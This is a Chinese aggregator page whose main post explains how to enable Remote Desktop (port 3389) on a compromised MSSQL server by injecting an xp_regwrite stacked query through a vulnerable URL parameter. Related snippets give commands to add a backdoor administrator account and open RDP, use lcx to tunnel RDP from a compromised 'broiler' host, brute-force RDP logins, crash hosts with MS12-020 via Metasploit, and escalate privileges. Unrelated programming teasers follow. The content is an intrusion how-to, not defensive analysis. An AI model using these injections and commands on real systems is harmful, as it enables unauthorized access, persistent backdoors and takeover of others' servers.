MSSQL开启3389

其实就是利用MSSQL的存储过程xp_regwrite 。大家在渗透MSSQL服务器的时候，苦于无法上传开3389工具和3389工具不免杀时，可以使用此招轻松开启3389。

3389登陆关键注册表位置：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections
其中键值DenyTSConnections 直接控制着3389的开启和关闭。当该键值为0表示3389开启，1则表示关闭。而MSSQL的xp_regwrite的存储过程可以对注册进行修改。我们使用这点就可以简单的修改DenyTSConnections键值，从而控制3389的关闭和开启。

开启3389的SQL语句：
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE‘,‘SYSTEM\CurrentControlSet\Control\Terminal Server‘,‘fDenyTSConnections‘,‘REG_DWORD‘,0;

关闭3389的SQL语句：
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE‘,‘SYSTEM\CurrentControlSet\Control\Terminal Server‘,‘fDenyTSConnections‘,‘REG_DWORD‘,1;

时间： 2024-11-05 17:19:39

MSSQL开启3389的相关文章

cmd创建用户开启3389命令

1.创建用户chen Net user chen 1234566 /add 2.将用户chen添加到管理员组 net localgroup Administrators chen /add 3.开启3389端口 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 原文地址:https://www.cnblogs.

黑客入侵后端口转发利器lcx,开启3389旅途

lcx可以将内网端口映射到本机,缺点是需要本地电脑拥有外网IP,不然在某些情况lcx就无用武之地了.与之相比,reDuh更加优秀,后续会讲到. lcx只有3中命令,常用的有2种. 首先在肉鸡上lcx.exe -slave 本机IP PORT1 肉鸡IP 3389 然后本地执行 lcx.exe -listen PORT1 PORT2: 登陆远程桌面输入127.0.0.1:PORT2,即可登陆到肉鸡的桌面. 在肉鸡3389开启的情况下,webshell提权中也常用lcx进行内网转发.

cmd开启3389，无需重启！

echo DO ALL IN CMD! reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

[集合]解决system权限3389无法添加的用户情况

Webshell有了SYSTEM权限,却无法成功添加administrators用户,因此导致无法成功连接3389.总结原因有以下几点:I.杀软篇1,360杀毒软件2,麦咖啡杀毒软件3,卡巴斯基杀毒软件4,其他杀毒软件或防护软件II.策略篇1,3389端口变更2,莫名其妙无法添加账户3,管理员限制篇4,系统已达最大连接数处理 ———————–I. 杀软篇—————————–1,360杀毒软件经常会在国内的一些服务器上遇到360杀毒和防护软件,如果使用webshell进行添加administrat

Windows服务器SYSTEM权限Webshell无法添加3389账户情况突破总结

转自:http://bbs.blackbap.org/thread-2331-1-1.html 近好多Silic的朋友在Windows下SYSTEM权限的php webshell下添加账户,但是却无法成功.SYSTEM的权限,权限是够了,却无法成功,原因是什么呢?原因有很多种,于是我总结了一下成因,并在下面文章进行了一一分析,然后附上了一点个人的突破绕过方法.提权不可能百分百成功,我只是总结了一些常见的情况,其他的我会慢慢补充作者:YoCo Smart来自:Silic Group Hacker

3389爆破服务器技术全过程与原理

其实爆破服务器很简单的,也是必学的. 3389是一个远程桌面的端口,很多人为了更方便管理服务器,更新服务器上的资源等,经常会开启3389端口,用nastat-an命令可以查看该端口的开启.对于一个账户如果账号密码过于弱很容易被爆破到,一般默认账号为Administrator或admin,而对于过于简单的密码,在3389密码字典中均可找到,下面来讲解爆破3389服务器,获得一台服务器的全过程. 工具:DUbrute爆破工具(或者用frdpb)SYN扫描工具IP Search 首先用IPseache

CVE-2012-0002（MS12-020）3389远程溢出漏洞

1:攻击机:Kali和windows皆可 2:目标机:windows XP系统(开启3389) Kali测试: search m12-020 搜索ms12-020 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 选择模块 show options 查看所需参数 set RHOST 192.168.0.110 设置目标IP地址 exploit 执行目标机重启了... Windows测试: 微软修复建议:https://technet.mi

DUbrute 3389爆破入侵教程

DUBrute是一款强大的远程桌面(3389)密码破解软件,你可以用本附件的扫描功能来自动扫描活跃IP地址,扫描完成后设置好用户名与需要猜解的密码就可以开始全自动工作了.只要你密码设置的好相信会有很大的收获哦. 3389是一个远程桌面的端口,很多人为了更方便管理服务器,更新服务器上的资源等,经常会开启3389端口,用nastat -an命令可以查看该端口的开启.对于一个账户如果账号密码过于弱很容易被爆破到,一般默认账号为Administrator,极少会是admin,而对于过于简单的密码,在33

提权笔记本

/* 转载请注明出处 ID:珍惜少年时 */ 21------------FTP //找到其FTP目录,破解其密码搜索,提之 22------------linux终端 23------------telnet //可以爆破,然后dos连接之,连接后添加用户开启终端端口,然后宣告拿下! 1433----------mssql提权 //需要找到sa密码,一般存在于web.config文件中,uid pwd sa为关键字,找到该文件后Ctrl+f搜索关键字提之 3306----------mysql

猜你喜欢

Given an array and a value, remove all instances of that value in place and return the new length. T ...

poj 2192 Zipper

题目链接:http://poj.org/problem?id=2192 Time Limit: 1000MS Memory Limit: 65536K Total Submissions: 186 ...

Vs2013 坑爹的Target framework问题

之前的一个项目是使用Vs2008来开发的,因为这段时间家里有事情所以只能跟经理协商在家里来做此项目,因为家里的VS是2013的所以在迁移时没有什么问题但今天我更改一个类库的文件后重新生成解决方案结果 ...

iOS 启动画面 App图标尺寸设置

App图标尺寸如下: 启动画面图标尺寸如下: 参考尺寸及命名下: 编号尺寸命名 1 640?×?1136 [email protected] 2 640?×?1136 LaunchIma[emai ...

内存映射的效率要比read/write效率高

http://blog.csdn.net/hongchangfirst/article/details/11599369 我们先来看看如果不使用内存映射文件的处理流程是怎样的,首先我们得先读出磁盘文件 ...

Python脚本通过邮件发送zabbix报警图片

Python脚本通过邮件发送zabbix报警图片流程如下: 通过zabbix传递给脚本的message参数,筛选出报警信息的itemid; 通过获取的itemid,在数据库中查找对应的grpahid; ...

J2SE快速进阶——递归算法

递归算法递归,百度百科对其定义为:程序调用自身的编程技巧.说白了就是一个函数或者过程在执行时会调用自身. 先用一个 " 求一个数的阶乘 " 的例子来说明 : public cla ...

PS(photoshop)抠图（切图）必备快捷键及要点简析

对于PS来说,小码哥也算是初学者,懂得也仅仅是一些工作上用的最多的常用知识,大家不要鄙视鄙人哈!下面嗫,是小码哥我平时抠图(切图)时,常用的一些工具和快捷键.看似简单,但是,只要用精了,做网站页面编写 ...

CPU31X-2DP通过DP网络连接远程IO站

一.远程IO站介绍二.该DP网络系统结构三.组态DP主站 1.组态机架硬件配置 2.设置profibus属性,主站地址为2,如下图 3.完成主站组态四.组态远程IO从站ET200M 1.接口模块 ...

iphone手机不同版本兼容、横竖屏

/* 兼容问题*/ @media screen and (device-width: 320px) and (device-height: 480px) and (-webkit-device-pix ...

下拉刷新和返回顶部

如下是布局文件主要是一个PullToRefreshView内包含一个Scrollview 在滑动面中放一个GridView 底部放个按钮当点击时会返回手机顶部其中的滑动PullToRefr ...

LeetCode 笔记24 Palindrome Partitioning II (智商碾压)

Given a string s, partition s such that every substring of the partition is a palindrome. Return the ...

poj3252数位dp

#include <cstdio> #include <cstring> #include <algorithm> #include <climits> ...

Sequence用堆排序

Description Given m sequences, each contains n non-negative integer. Now we may select one number fr ...

上海至芯培训中心投入运营

上海至芯培训中心于2014年4月28号正式成立并投入运营,感谢各位一如既往的对我们工作的支持. 上海至芯培训中心还是保持着优良的传统,我们有一流的师资,真诚的服务,并且我们保证每一位到来的学员都能实现 ...

简述Python语言的元组序列结构

序列是程序设计中经常用到的数据存储方式,几乎每一种程序设计语言都提供了表格数据结构,如C和Basic中的一维.多维数组等.Python语言提供的序列类型在所有程序设计语言中是最丰富,最灵活,也是功能最 ...

ACM题目————棋盘问题

Description 在一个给定形状的棋盘(形状可能是不规则的)上面摆放棋子,棋子没有区别.要求摆放时任意的两个棋子不能放在棋盘中的同一行或者同一列,请编程求解对于给定形状和大小的棋盘,摆放k个棋子 ...

初识结构体

Q:距离排序总时间限制: 1000ms 内存限制: 65536kB 描述给出三维空间中的n个点(不超过10个),求出n个点两两之间的距离,并按距离由大到小依次输出两个点的坐标及它们之间的距离. 输 ...

线程池调优

引用: 1.http://www.infoq.com/cn/articles/the-importance-of-thread-pool-in-java-web-application --inf ...

[attribute=value] 匹配给定的属性是某个特定值的元素

描述: 查找所有 name 属性是 newsletter 的 input 元素 HTML 代码: <input type="checkbox" name="news ...

专题

随机推荐

© 2024 憋错料 | info#biecuoliao.com | 11 q. 0.020 s.